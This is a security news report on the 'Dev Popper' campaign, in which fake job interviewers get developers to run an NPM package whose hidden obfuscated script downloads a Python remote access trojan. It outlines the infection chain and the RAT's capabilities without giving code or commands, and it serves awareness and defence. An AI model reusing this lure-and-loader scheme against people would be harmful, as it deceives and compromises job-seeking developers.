In fake job interviews, developers are coerced into installing Python backdoors

Securonix analysts have discovered a new campaign called Dev Popper targeting software developers. Hackers conduct fake interviews to lure victims into installing a Python Remote Access Trojan (RAT).

The Dev Popper attacks utilize a multi-stage infection chain based on social engineering, aimed at deceiving victims through gradual compromise. According to researchers, these attacks are likely orchestrated by North Korean threat actors, although there is currently insufficient data for precise attribution.

Researchers note that hackers “exploit the professional engagement of developers and their trust in the job application process, where refusing actions by the interviewer can endanger the job opportunity itself,” making the attacks highly effective.

Typically, hackers pose as employers claiming to have job vacancies for developers. During the interview, they ask candidates to download and execute a task from a GitHub repository. However, the real goal of the attackers is to make the victim download malware that collects system information and provides attackers with remote access to the host.

Thus, the “task” file usually consists of a ZIP archive containing an NPM package with a README.md, and frontend and backend directories. When the developer runs this NPM package, a hidden obfuscated JavaScript file (imageDetails.js) in the backend directory is activated, executing curl commands via the Node.js process to download an additional archive (p.zi) from an external server.

Inside this archive hides the payload of the next stage of the attack—an obfuscated Python script (npl), which is a Remote Access Trojan.

Once the RAT is activated on the victim’s system, it collects and transmits essential system information to a command server, including the OS type, hostname, and network parameters.

Securonix reports that the RAT possesses the following capabilities:

  • Establishing a persistent connection for ongoing control;
  • Searching for and stealing specific files and data from the file system;
  • Remote command execution for utilizing additional exploits and deploying malware;
  • Direct FTP data exfiltration from folders like Documents and Downloads;
  • Monitoring clipboard content and keystrokes to track user actions and potentially capture credentials.

It is worth noting that in recent years, there have been numerous warnings (1, 2, 3, 4) indicating that North Korean hackers use fake job openings to establish contacts and subsequently compromise IT security researchers, media organizations, software developers (especially for DeFi platforms), and aerospace organization employees.

0 / 5

Your page rank:


Subscribe: YouTube page opens in new windowLinkedin page opens in new windowTelegram page opens in new window

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment